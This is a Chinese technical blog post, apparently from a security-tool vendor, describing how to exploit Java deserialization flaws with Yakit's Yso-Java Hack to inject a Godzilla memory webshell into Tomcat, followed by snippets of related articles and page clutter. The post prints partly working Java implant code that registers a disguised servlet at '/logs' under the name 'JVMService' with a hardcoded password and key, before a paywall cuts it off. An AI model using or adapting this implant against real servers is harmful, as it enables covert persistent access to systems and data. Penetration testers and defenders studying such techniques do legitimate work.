Yso-Java Hack 进阶:利用反序列化漏洞打内存马

原创 已于 2023-11-03 14:13:43 修改 · 543 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言

于 2023-11-03 14:11:16 首次发布
本文介绍了如何利用反序列化漏洞通过Yso-JavaHack技术在不联网情况下创建内存马,包括生成内存马的步骤,如何通过改造类加载机制并使用哥斯拉工具,以及实战演练的过程。作者强调了这种方法的可扩展性和效率提升价值。

Yso-Java Hack 进阶:利用反序列化漏洞打内存马

背景

对于反序列化漏洞利用,一般命令执行后可以直接反弹shell或上线cs,但不出网的情况下想获取目标机器的信息,或进一步利用,就需要用到内存马配合shell管理工具了。
Yso-Java Hack 功能上了有一段时间了,可能有些师傅还不太熟悉,其实使用起来很方便,本篇文章介绍下如何利用反序列化漏洞直接打入内存马。

生成内存马

现在Yakit暂时还没有 shell 管理功能,所以就选用哥斯拉做 shell 管理工具。针对哥斯拉的马进行改造,改成servlet内存马。
我用的哥斯拉版本是4.0.1,生成的是jsp马,改成内存马就像下面这样。

import org.apache.catalina.core.StandardContext;
import javax.servlet.Servlet;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
public class GodzillaMem extends HttpServlet {
    String xc = "3c6e0b8a9c15224a";
    String pass = "pass";
    static String pattern = "/logs";
    static String servletName = "JVMService";
    String md5 = md5(pass + xc);
    Class payload;
    static {
        Servlet servlet = new GodzillaMem();
        org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
        StandardContext standardCtx = (StandardContext)webappClassLoaderBase.getResources().getContext();
        org.apache.catalina.Wrapper newWrapper = standardCtx.createWrapper();
        newWrapper.setName(servletName);
        newWrapper.setLoadOnStartup(1);
        newWrapper.setServlet(servlet);
        newWrapper.setServletClass(servlet.getClass().getName());
        standardCtx.addChild(newWrapper);
        standardCtx.addServletMappingDecoded(patte
最低0.47元/天 解锁文章
YakProject
关注
网络安全工具 Godzilla 哥斯拉内存使用
SHELLCODE_8BIT的博客
09-03 3932
测试时把生成的 shell.jsp 放到 tomcat webapps 下的任意一个可以访问的 web app 目录里,比如 webapps/ROOT 目录下,启动 tomcat 后访问 shell.jsp,返回页面没有报错即成功。测试环境:tomcat、Godzilla、jdk11。添加管理的 shell。
高效开发Java 反序列化漏洞 POC
YakProject的博客
11-24 1324
首先在yakit内置dnslog服务申请一个域名,再打开webfuzzer,使用yso:dnslog标签配合dnslog域名爆破可用链,如图,右侧可以看到payload为:CommonsCollections3 dnslog evil class xxx.dgrh3.cn,在yakit右上角的 "漏洞与风险" 收到了反连提醒,说明目标成功加载了class。yaklang的java基础设施基本可以满足编写POC、EXP的需求,可以使用yakit的反连、Yso-Java Hack辅助脚本编写,可以提升效率。
【亲测免费】 JYso 项目教程
gitblog_00081的博客
09-26 872
JYso 是一款多功能工具,可以同时作为 JNDIExploit 和 ysoserial 使用。它具备多种 JNDI 高版本、WAF、RASP 的 Bypass 功能,支持自定义修改内存的路径、密码、验证的 HTTP 头与值,并且支持无文件落地 Agent 打入。JYso 还支持将内存写入 JRE 或环境变量来隐藏,序列化数据加脏数据,以及进行 3 字节对应的 UTF-8 编码。此外,JYso...
新功能史上最好用的反连&JavaHack,安全能力基座强化ing
白帽黑客八哥的博客
06-21 1855
有些Java漏洞利用太繁琐了,需要java环境、多种工具配合使用、还要在虚拟服务器上看回显、记各种命令…对比之下 Yakit 真的太好用了。本次更新的两个功能基本上可以解决大部分Java漏洞利用的场景,希望师傅们多多使用,欢迎提出意见。
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
C#进阶之路:揭秘反序列化漏洞与解决方案.docx
最新发布
04-02
C#进阶之路:揭秘反序列化漏洞与解决方案.docx
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
使用 Fuzztag 一键爆破反序列化
阿道夫的博客
03-06 439
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Godzilla(哥斯拉)安装与使用
剁椒鱼头没剁椒的博客
12-22 1万+
这里介绍可以直接看作者的对软件的介绍,这里就不复述了,复述也是类似抄一遍,没准还没说对。
哥斯拉(Godzilla)下载与安装,使用木连接教程
m0_70787202的博客
03-31 6997
1.哥斯拉下载与安装 2.哥斯拉自带木添加数据测试连接
java序列化理解_对ysoserial工具及java反序列化的一个阶段性理解
weixin_39615808的博客
02-24 371
经过一段时间的琢磨与反思,以及重读了大量之前看不懂的反序列化文章,目前为止算是对java反序列化这块有了一个阶段性的小理解。目前为止,发送的所有java反序列化漏洞中。主要需要两个触发条件:1、反序列化的攻击入口2、反序列化的pop攻击链这两个条件缺一不可。网上大量分析gadgets的文章方法,让人误以为有攻击链就可以反序列化。其实这块是有一定的误导性的。在我最初研究反序列化的时候,我觉得攻击链...
干货|冰蝎、哥斯拉 内存应急排查
热门推荐
m0_60571990的博客
12-29 1万+
干货|冰蝎、哥斯拉 内存应急排查
实战分享:用Yak-yso解决一些常见问题
YakProject的博客
07-09 1286
有同学常常使用yak-yso生成的时候,不关注java版本而使用了默认的(默认52也就是JDK1.8),会导致有些情况下,某些链子打不通的情况。(原因是:当版本进行升级的时候,有些内置函数、方法、接口都会做出改变)yak-yso中内置了两种模式的和。yak中的反连平台webFuzzer下面就用一个小的靶场demo来进行简单说明。
java反序列化漏洞注入内存
moonteam的博客
03-09 1306
jMG (Java Memshell Generator) 是一款支持高度自定义的 java 内存生成工具,可作为 woodpecker 的插件使用,提供常见中间件的内存注入支持。功能介绍支持的中间件 (Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/GlassFish/Spring)支持的网站管理工具 (Behinder/Godzilla/Custom)支持的内存类型 (Filter/Listener/Interceptor)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值